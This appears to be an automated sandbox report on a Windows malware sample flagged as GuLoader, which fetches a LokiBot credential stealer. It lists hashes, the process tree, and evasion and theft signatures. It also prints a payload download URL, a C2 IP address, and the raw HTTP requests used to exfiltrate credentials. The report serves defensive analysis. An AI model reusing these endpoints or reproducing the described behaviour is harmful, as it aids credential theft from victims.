Play interactive tour

Edit tour

Windows Analysis Report lzJWJgZhPc

Overview

General Information

Sample Name:	lzJWJgZhPc (renamed file extension from none to exe)
Analysis ID:	532379
MD5:	46984f492d6314442d1a502d7ab460c4
SHA1:	3515b9159efe0abc0df68d352c4e1bed4391c2fe
SHA256:	4366a0e113d168f2809a4a1983c2198ec874b89af0bdfe465e753d409c85c51c
Infos:
Most interesting Screenshot:

Detection

GuLoader

Score:	100
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

Found malware configuration

Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)

Multi AV Scanner detection for submitted file

Antivirus detection for URL or domain

GuLoader behavior detected

Yara detected GuLoader

Hides threads from debuggers

Tries to steal Mail credentials (via file / registry access)

Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc)

Tries to detect Any.run

Tries to harvest and steal ftp login credentials

Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)

Machine Learning detection for dropped file

C2 URLs / IPs found in malware configuration

Tries to harvest and steal browser information (history, passwords, etc)

Uses 32bit PE files

May sleep (evasive loops) to hinder dynamic analysis

Contains functionality to shutdown / reboot the system

Uses code obfuscation techniques (call, push, ret)

Internet Provider seen in connection with other malware

Detected potential crypto function

Sample execution stops while process was sleeping (likely an evasion)

JA3 SSL client fingerprint seen in connection with other malware

Contains functionality to call native functions

IP address seen in connection with other malware

Abnormal high CPU Usage

Enables debug privileges

Found a high number of Window / User specific system calls (may be a loop to detect user behavior)

Sample file is different than original file name gathered from version info

PE file contains strange resources

Drops PE files

Contains functionality to read the PEB

Uses a known web browser user agent for HTTP communication

Creates a process in suspended mode (likely to inject code)

Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)

Contains functionality for read data from the clipboard

Classification

Process Tree

System is w10x64

lzJWJgZhPc.exe (PID: 3148 cmdline: "C:\Users\user\Desktop\lzJWJgZhPc.exe" MD5: 46984F492D6314442D1A502D7AB460C4)

Form_Sporogeni.exe (PID: 3404 cmdline: C:\Users\user\AppData\Local\Temp\Form_Sporogeni.exe MD5: 3C6FB2D5CB7A8CCF575C378C5883EAC2)

Form_Sporogeni.exe (PID: 1740 cmdline: C:\Users\user\AppData\Local\Temp\Form_Sporogeni.exe MD5: 3C6FB2D5CB7A8CCF575C378C5883EAC2)

cleanup

Malware Configuration

Threatname: GuLoader

{"Payload URL": "https://drive.google.com/uc?export=download&id=1CVReMZqOnEVXpF"}

Yara Overview

Memory Dumps

Source	Rule	Description	Author	Strings
00000006.00000002.411449067.00000000080A0000.00000040.00000001.sdmp	JoeSecurity_GuLoader_2	Yara detected GuLoader	Joe Security
0000000C.00000000.410653501.0000000000560000.00000040.00000001.sdmp	JoeSecurity_GuLoader_2	Yara detected GuLoader	Joe Security

Sigma Overview

No Sigma rule has matched

Jbx Signature Overview

Click to jump to signature section

Show All Signature Results

AV Detection:

Found malware configuration

Show sources

Source: 00000006.00000002.411449067.00000000080A0000.00000040.00000001.sdmp

Malware Configuration Extractor: GuLoader {"Payload URL": "https://drive.google.com/uc?export=download&id=1CVReMZqOnEVXpF"}

Multi AV Scanner detection for submitted file

Show sources

Source: lzJWJgZhPc.exe

ReversingLabs: Detection: 39%

Antivirus detection for URL or domain

Show sources

Source: http://63.250.34.171/tickets.php?id=277

Avira URL Cloud: Label: malware

Machine Learning detection for dropped file

Show sources

Source: C:\Users\user\AppData\Local\Temp\Form_Sporogeni.exe

Joe Sandbox ML: detected

Source: lzJWJgZhPc.exe

Static PE information: LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, RELOCS_STRIPPED

Source: unknown	HTTPS traffic detected: 142.250.203.110:443 -> 192.168.2.3:49758 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 142.250.180.161:443 -> 192.168.2.3:49760 version: TLS 1.2

Source: lzJWJgZhPc.exe

Static PE information: NO_SEH, TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT

Source: C:\Users\user\Desktop\lzJWJgZhPc.exe	Code function: 1_2_00406873 FindFirstFileW,FindClose,
Source: C:\Users\user\Desktop\lzJWJgZhPc.exe	Code function: 1_2_00405C49 GetTempPathW,DeleteFileW,lstrcatW,lstrcatW,lstrlenW,FindFirstFileW,FindNextFileW,FindClose,
Source: C:\Users\user\Desktop\lzJWJgZhPc.exe	Code function: 1_2_0040290B FindFirstFileW,

Networking:

Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)

Show sources

Source: Traffic	Snort IDS: 2024312 ET TROJAN LokiBot Application/Credential Data Exfiltration Detected M1 192.168.2.3:49761 -> 63.250.34.171:80
Source: Traffic	Snort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.3:49761 -> 63.250.34.171:80
Source: Traffic	Snort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.3:49761 -> 63.250.34.171:80
Source: Traffic	Snort IDS: 2024317 ET TROJAN LokiBot Application/Credential Data Exfiltration Detected M2 192.168.2.3:49761 -> 63.250.34.171:80
Source: Traffic	Snort IDS: 2024312 ET TROJAN LokiBot Application/Credential Data Exfiltration Detected M1 192.168.2.3:49762 -> 63.250.34.171:80
Source: Traffic	Snort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.3:49762 -> 63.250.34.171:80
Source: Traffic	Snort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.3:49762 -> 63.250.34.171:80
Source: Traffic	Snort IDS: 2024317 ET TROJAN LokiBot Application/Credential Data Exfiltration Detected M2 192.168.2.3:49762 -> 63.250.34.171:80
Source: Traffic	Snort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.3:49773 -> 63.250.34.171:80
Source: Traffic	Snort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.3:49773 -> 63.250.34.171:80
Source: Traffic	Snort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.3:49773 -> 63.250.34.171:80
Source: Traffic	Snort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.3:49773 -> 63.250.34.171:80

C2 URLs / IPs found in malware configuration

Show sources

Source: Malware configuration extractor

URLs: https://drive.google.com/uc?export=download&id=1CVReMZqOnEVXpF

Source: Joe Sandbox View

ASN Name: NAMECHEAP-NETUS NAMECHEAP-NETUS

Source: Joe Sandbox View

JA3 fingerprint: 37f463bf4616ecd445d4a1937da06e19

Source: Joe Sandbox View

IP Address: 63.250.34.171 63.250.34.171

Source: global traffic	HTTP traffic detected: GET /uc?export=download&id=1CVReMZqOnEVXpFs65OM8v3lOQDCXMaKB HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like GeckoHost: drive.google.comCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /docs/securesc/ha0ro937gcuc7l7deffksulhg5h7mbp1/bvmn5idfnisv3ndpp2nat5to25uprreq/1638425325000/03026244708369606156/*/1CVReMZqOnEVXpFs65OM8v3lOQDCXMaKB?e=download HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like GeckoCache-Control: no-cacheHost: doc-00-50-docs.googleusercontent.comConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: POST /tickets.php?id=277 HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 63.250.34.171Accept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: AA495C78Content-Length: 190Connection: close
Source: global traffic	HTTP traffic detected: POST /tickets.php?id=277 HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 63.250.34.171Accept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: AA495C78Content-Length: 190Connection: close
Source: global traffic	HTTP traffic detected: POST /tickets.php?id=277 HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 63.250.34.171Accept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: AA495C78Content-Length: 163Connection: close

Source: unknown	Network traffic detected: HTTP traffic on port 49758 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49760
Source: unknown	Network traffic detected: HTTP traffic on port 49760 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49758

Source: global traffic	HTTP traffic detected: HTTP/1.1 403 ForbiddenDate: Thu, 02 Dec 2021 06:09:39 GMTServer: Apache/2.4.38 (Debian)Content-Length: 287Connection: closeContent-Type: text/html; charset=UTF-8Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 0d 0a 3c 70 3e 59 6f 75 20 64 6f 6e 27 74 20 68 61 76 65 20 70 65 72 6d 69 73 73 69 6f 6e 20 74 6f 20 61 63 63 65 73 73 20 74 68 69 73 20 72 65 73 6f 75 72 63 65 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 0d 0a 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 33 38 20 28 44 65 62 69 61 6e 29 20 53 65 72 76 65 72 20 61 74 20 36 33 2e 32 35 30 2e 33 34 2e 31 37 31 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0d 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>403 Forbidden</title></head><body><h1>Forbidden</h1><p>You don't have permission to access this resource.</p><hr><address>Apache/2.4.38 (Debian) Server at 63.250.34.171 Port 80</address></body></html>
Source: global traffic	HTTP traffic detected: HTTP/1.1 403 ForbiddenDate: Thu, 02 Dec 2021 06:09:43 GMTServer: Apache/2.4.38 (Debian)Content-Length: 287Connection: closeContent-Type: text/html; charset=UTF-8Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 0d 0a 3c 70 3e 59 6f 75 20 64 6f 6e 27 74 20 68 61 76 65 20 70 65 72 6d 69 73 73 69 6f 6e 20 74 6f 20 61 63 63 65 73 73 20 74 68 69 73 20 72 65 73 6f 75 72 63 65 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 0d 0a 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 33 38 20 28 44 65 62 69 61 6e 29 20 53 65 72 76 65 72 20 61 74 20 36 33 2e 32 35 30 2e 33 34 2e 31 37 31 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0d 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>403 Forbidden</title></head><body><h1>Forbidden</h1><p>You don't have permission to access this resource.</p><hr><address>Apache/2.4.38 (Debian) Server at 63.250.34.171 Port 80</address></body></html>
Source: global traffic	HTTP traffic detected: HTTP/1.1 403 ForbiddenDate: Thu, 02 Dec 2021 06:09:46 GMTServer: Apache/2.4.38 (Debian)Content-Length: 287Connection: closeContent-Type: text/html; charset=UTF-8Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 0d 0a 3c 70 3e 59 6f 75 20 64 6f 6e 27 74 20 68 61 76 65 20 70 65 72 6d 69 73 73 69 6f 6e 20 74 6f 20 61 63 63 65 73 73 20 74 68 69 73 20 72 65 73 6f 75 72 63 65 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 0d 0a 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 33 38 20 28 44 65 62 69 61 6e 29 20 53 65 72 76 65 72 20 61 74 20 36 33 2e 32 35 30 2e 33 34 2e 31 37 31 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0d 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>403 Forbidden</title></head><body><h1>Forbidden</h1><p>You don't have permission to access this resource.</p><hr><address>Apache/2.4.38 (Debian) Server at 63.250.34.171 Port 80</address></body></html>

Source: unknown	TCP traffic detected without corresponding DNS query: 63.250.34.171
Source: unknown	TCP traffic detected without corresponding DNS query: 63.250.34.171
Source: unknown	TCP traffic detected without corresponding DNS query: 63.250.34.171
Source: unknown	TCP traffic detected without corresponding DNS query: 63.250.34.171
Source: unknown	TCP traffic detected without corresponding DNS query: 63.250.34.171
Source: unknown	TCP traffic detected without corresponding DNS query: 63.250.34.171
Source: unknown	TCP traffic detected without corresponding DNS query: 63.250.34.171
Source: unknown	TCP traffic detected without corresponding DNS query: 63.250.34.171
Source: unknown	TCP traffic detected without corresponding DNS query: 63.250.34.171
Source: unknown	TCP traffic detected without corresponding DNS query: 63.250.34.171
Source: unknown	TCP traffic detected without corresponding DNS query: 63.250.34.171
Source: unknown	TCP traffic detected without corresponding DNS query: 63.250.34.171
Source: unknown	TCP traffic detected without corresponding DNS query: 63.250.34.171
Source: unknown	TCP traffic detected without corresponding DNS query: 63.250.34.171
Source: unknown	TCP traffic detected without corresponding DNS query: 63.250.34.171
Source: unknown	TCP traffic detected without corresponding DNS query: 63.250.34.171
Source: unknown	TCP traffic detected without corresponding DNS query: 63.250.34.171
Source: unknown	TCP traffic detected without corresponding DNS query: 63.250.34.171

Source: Form_Sporogeni.exe, 0000000C.00000002.524923598.000000001E706000.00000004.00000001.sdmp	String found in binary or memory: http://63.250.34.171/tickets.php?id=277
Source: Form_Sporogeni.exe, 0000000C.00000002.524944806.000000001E719000.00000004.00000001.sdmp	String found in binary or memory: http://crl.globalsign.net/root-r2.crl0
Source: lzJWJgZhPc.exe	String found in binary or memory: http://nsis.sf.net/NSIS_ErrorError
Source: Form_Sporogeni.exe, 0000000C.00000003.497554994.000000000097A000.00000004.00000001.sdmp, Form_Sporogeni.exe, 0000000C.00000002.524994253.000000001E756000.00000004.00000001.sdmp, Form_Sporogeni.exe, 0000000C.00000003.498697620.0000000000979000.00000004.00000001.sdmp, Form_Sporogeni.exe, 0000000C.00000002.524944806.000000001E719000.00000004.00000001.sdmp, Form_Sporogeni.exe, 0000000C.00000003.498525929.0000000000977000.00000004.00000001.sdmp	String found in binary or memory: https://doc-00-50-docs.googleusercontent.com/
Source: Form_Sporogeni.exe, 0000000C.00000002.524944806.000000001E719000.00000004.00000001.sdmp	String found in binary or memory: https://doc-00-50-docs.googleusercontent.com/docs/securesc/ha0ro937gcuc7l7deffksulhg5h7mbp1/bvmn5idf

Source: unknown

HTTP traffic detected: POST /tickets.php?id=277 HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 63.250.34.171Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: AA495C78Content-Length: 190Connection: close

Source: unknown

DNS traffic detected: queries for: drive.google.com

Source: global traffic	HTTP traffic detected: GET /uc?export=download&id=1CVReMZqOnEVXpFs65OM8v3lOQDCXMaKB HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like GeckoHost: drive.google.comCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /docs/securesc/ha0ro937gcuc7l7deffksulhg5h7mbp1/bvmn5idfnisv3ndpp2nat5to25uprreq/1638425325000/03026244708369606156/*/1CVReMZqOnEVXpFs65OM8v3lOQDCXMaKB?e=download HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like GeckoCache-Control: no-cacheHost: doc-00-50-docs.googleusercontent.comConnection: Keep-Alive

Source: unknown	HTTPS traffic detected: 142.250.203.110:443 -> 192.168.2.3:49758 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 142.250.180.161:443 -> 192.168.2.3:49760 version: TLS 1.2

Source: C:\Users\user\Desktop\lzJWJgZhPc.exe

Code function: 1_2_004056DE GetDlgItem,GetDlgItem,GetDlgItem,GetDlgItem,GetClientRect,GetSystemMetrics,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,ShowWindow,ShowWindow,GetDlgItem,SendMessageW,SendMessageW,SendMessageW,GetDlgItem,CreateThread,CloseHandle,ShowWindow,ShowWindow,ShowWindow,ShowWindow,SendMessageW,CreatePopupMenu,AppendMenuW,GetWindowRect,TrackPopupMenu,SendMessageW,OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,SendMessageW,GlobalUnlock,SetClipboardData,CloseClipboard,

Source: lzJWJgZhPc.exe

Static PE information: LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, RELOCS_STRIPPED

Source: C:\Users\user\Desktop\lzJWJgZhPc.exe

Code function: 1_2_0040352D EntryPoint,SetErrorMode,GetVersionExW,GetVersionExW,GetVersionExW,lstrlenA,#17,OleInitialize,SHGetFileInfoW,GetCommandLineW,CharNextW,GetTempPathW,GetTempPathW,GetWindowsDirectoryW,lstrcatW,GetTempPathW,lstrcatW,SetEnvironmentVariableW,SetEnvironmentVariableW,SetEnvironmentVariableW,DeleteFileW,lstrcatW,lstrcatW,lstrcatW,lstrcmpiW,SetCurrentDirectoryW,DeleteFileW,CopyFileW,CloseHandle,ExitProcess,OleUninitialize,ExitProcess,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,ExitWindowsEx,ExitProcess,

Source: C:\Users\user\Desktop\lzJWJgZhPc.exe	Code function: 1_2_0040755C
Source: C:\Users\user\Desktop\lzJWJgZhPc.exe	Code function: 1_2_00406D85
Source: C:\Users\user\AppData\Local\Temp\Form_Sporogeni.exe	Code function: 6_2_080A78B1
Source: C:\Users\user\AppData\Local\Temp\Form_Sporogeni.exe	Code function: 6_2_080AF4FC
Source: C:\Users\user\AppData\Local\Temp\Form_Sporogeni.exe	Code function: 6_2_080A1B06
Source: C:\Users\user\AppData\Local\Temp\Form_Sporogeni.exe	Code function: 6_2_080A9950
Source: C:\Users\user\AppData\Local\Temp\Form_Sporogeni.exe	Code function: 6_2_080A0D7B
Source: C:\Users\user\AppData\Local\Temp\Form_Sporogeni.exe	Code function: 6_2_080A3A1A
Source: C:\Users\user\AppData\Local\Temp\Form_Sporogeni.exe	Code function: 6_2_080A1A1E
Source: C:\Users\user\AppData\Local\Temp\Form_Sporogeni.exe	Code function: 6_2_080A743B
Source: C:\Users\user\AppData\Local\Temp\Form_Sporogeni.exe	Code function: 6_2_080A9E50
Source: C:\Users\user\AppData\Local\Temp\Form_Sporogeni.exe	Code function: 6_2_080A1E7F
Source: C:\Users\user\AppData\Local\Temp\Form_Sporogeni.exe	Code function: 6_2_080AB8C3
Source: C:\Users\user\AppData\Local\Temp\Form_Sporogeni.exe	Code function: 6_2_080A32FB
Source: C:\Users\user\AppData\Local\Temp\Form_Sporogeni.exe	Code function: 6_2_080A3318
Source: C:\Users\user\AppData\Local\Temp\Form_Sporogeni.exe	Code function: 6_2_080A0524
Source: C:\Users\user\AppData\Local\Temp\Form_Sporogeni.exe	Code function: 6_2_080A1B30
Source: C:\Users\user\AppData\Local\Temp\Form_Sporogeni.exe	Code function: 6_2_080A0166
Source: C:\Users\user\AppData\Local\Temp\Form_Sporogeni.exe	Code function: 6_2_080A0564
Source: C:\Users\user\AppData\Local\Temp\Form_Sporogeni.exe	Code function: 6_2_080A0393
Source: C:\Users\user\AppData\Local\Temp\Form_Sporogeni.exe	Code function: 6_2_080A05AA
Source: C:\Users\user\AppData\Local\Temp\Form_Sporogeni.exe	Code function: 6_2_080A1BC9
Source: C:\Users\user\AppData\Local\Temp\Form_Sporogeni.exe	Code function: 6_2_080A17CF
Source: C:\Users\user\AppData\Local\Temp\Form_Sporogeni.exe	Code function: 6_2_080AB5C0
Source: C:\Users\user\AppData\Local\Temp\Form_Sporogeni.exe	Code function: 6_2_080A55E9
Source: C:\Users\user\AppData\Local\Temp\Form_Sporogeni.exe	Code function: 6_2_080A19EC

Source: C:\Users\user\AppData\Local\Temp\Form_Sporogeni.exe	Code function: 6_2_080A78B1 NtWriteVirtualMemory,LoadLibraryA,
Source: C:\Users\user\AppData\Local\Temp\Form_Sporogeni.exe	Code function: 6_2_080A9950 NtAllocateVirtualMemory,
Source: C:\Users\user\AppData\Local\Temp\Form_Sporogeni.exe	Code function: 12_2_00570204 LdrInitializeThunk,NtProtectVirtualMemory,
Source: C:\Users\user\AppData\Local\Temp\Form_Sporogeni.exe	Code function: 12_2_005703C8 Sleep,NtProtectVirtualMemory,
Source: C:\Users\user\AppData\Local\Temp\Form_Sporogeni.exe	Code function: 12_2_00570212 LdrInitializeThunk,NtProtectVirtualMemory,
Source: C:\Users\user\AppData\Local\Temp\Form_Sporogeni.exe	Code function: 12_2_005702DD NtProtectVirtualMemory,
Source: C:\Users\user\AppData\Local\Temp\Form_Sporogeni.exe	Code function: 12_2_005702C4 NtProtectVirtualMemory,
Source: C:\Users\user\AppData\Local\Temp\Form_Sporogeni.exe	Code function: 12_2_005701CD LdrInitializeThunk,NtProtectVirtualMemory,
Source: C:\Users\user\AppData\Local\Temp\Form_Sporogeni.exe	Code function: 12_2_005701CB LdrInitializeThunk,NtProtectVirtualMemory,
Source: C:\Users\user\AppData\Local\Temp\Form_Sporogeni.exe	Code function: 12_2_00570479 NtProtectVirtualMemory,
Source: C:\Users\user\AppData\Local\Temp\Form_Sporogeni.exe	Code function: 12_2_00570423 NtProtectVirtualMemory,
Source: C:\Users\user\AppData\Local\Temp\Form_Sporogeni.exe	Code function: 12_2_005703ED NtProtectVirtualMemory,

Source: C:\Users\user\AppData\Local\Temp\Form_Sporogeni.exe

Process Stats: CPU usage > 98%

Source: lzJWJgZhPc.exe, 00000001.00000002.299514998.0000000000428000.00000004.00020000.sdmp	Binary or memory string: OriginalFilenameForm_Sporogeni.exePADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDING vs lzJWJgZhPc.exe
Source: lzJWJgZhPc.exe, 00000001.00000002.299502964.000000000040F000.00000004.00020000.sdmp	Binary or memory string: OriginalFilenameForm_Sporogeni.exePADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPA